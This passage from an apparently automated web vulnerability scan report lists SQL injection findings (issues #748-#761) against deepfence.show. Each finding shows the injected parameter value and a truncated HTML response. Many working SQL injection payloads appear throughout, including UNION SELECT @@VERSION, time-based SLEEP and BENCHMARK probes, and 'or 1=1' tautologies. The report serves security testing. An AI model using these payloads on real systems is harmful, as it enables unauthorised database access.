\"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #748\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #749\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #750\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io SLEEP(1)/*' or SLEEP(1) or '\" or SLEEP(1) or \"*/\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #751\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #752\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #753\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\ndemouser@deepfence.io admin' or 1=1 or ''='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #754\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessaryhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #755\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #756\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io (SELECT * FROM (SELECT(SLEEP(5)))ecMj)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #757\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' OR 'x'='x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #758Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\"\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #759\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSLEEP(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #760\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #761\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSLEEP(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" 